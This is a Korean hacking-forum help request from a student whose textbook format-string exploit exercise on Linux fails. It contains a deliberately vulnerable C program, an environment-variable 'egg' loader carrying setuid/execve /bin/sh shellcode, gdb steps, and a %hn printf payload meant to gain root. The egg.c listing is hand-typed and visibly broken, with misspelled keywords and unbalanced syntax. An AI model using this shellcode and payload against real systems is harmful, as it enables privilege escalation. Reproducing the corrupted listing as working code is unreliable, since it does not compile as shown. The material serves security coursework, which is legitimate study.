시스템 해킹

1574,

72/79

bluesun2

리눅스 포맷스트링공격 질문 입니다 (대학교 과제인데 도와주세요 ㅠㅠ)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1448 [복사]

대학생인데요 교수님이 과제를 내주셨는데 대가리 뽁가지게 해도 안되네요 ㅠㅠ
코딩은 2개했는데요 소스는 아래에 적겠습니다

gdb bugfile (bugfile 코딩파일) 소스는 아래

disass main

main+3 을찾아서 적음 (0x080483d3 )

break *0x08048657

run 치면 (no debugging symbols found) 라는 글뜸

info reg 치면 $ebp 0xbff3a88 값나옴

x/12 $ebp 치면 위에꺼랑같은 0xbff3a88 값나옴

./egg 처서 값생성함 ( egg 코딩파일) 소스는 아래

0xbff085e8 값 생성

여기서 1bff0 이랑 85e8이라는 값을 나누어서 16진수에서 10진수로 변환

114672 와 34280 이라는 값으로 댐

여기서 34280은 문자 16개가 들어갈것이므로 16을뺌 (34264)

나온숫자끼리 빼서 114672 - 34280 = (80392) 값으로댐

이제 공격코드를 짜서 (printf "\x41\x41\x41\x41\x6c\xf3\xff\xbf\41\x41\x41\x41\xfe\xf3\xff\xbf%%34264d%%hn%%80392d%%hn"; cat) | ./bugfile

이라고 작성

실행 하면 세그먼테이션 오류 라고 뜸 루트권한 취득도 실패 ㅠㅠ 책대로 다 했는데 왜 안되는거죠 교재는 (itcookbook 정보보안개론과 실습 시스템해킹과 보안편 입니다)

아 진짜 뭐가 잘못된지 모르겠네요 도와주세요 ㅠㅠ

(소스)
bugfile.c
#include <stdio.h>

main() {

int i =0;
char buf[ 64];
memset (buf, 0, 64);
read(0, buf, 64);
printf(buf);
}

egg.c (장문입니다 손으로 쳐서 오타가있을수도)

#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x00\xc9\xc3\x90/bin/sh";

unnsigned long get_esp (void) {

__asm__("movl %esp, %eax")

main (int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}

if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}

addr = get_esp() - offset;
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;

for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
system("/bin/bash");
}

Hit : 4433 Date : 2010/12/07 04:29


CodeAche	위 테스트를 수행한 자세한 환경이 뭔지요. uname -a했을때의 결과나.. cat /etc/redhat-release 나..뭐 그런거요 ㅎ	2010/12/08
bluesun2	suse 리눅스 1.5 입니다	2010/12/08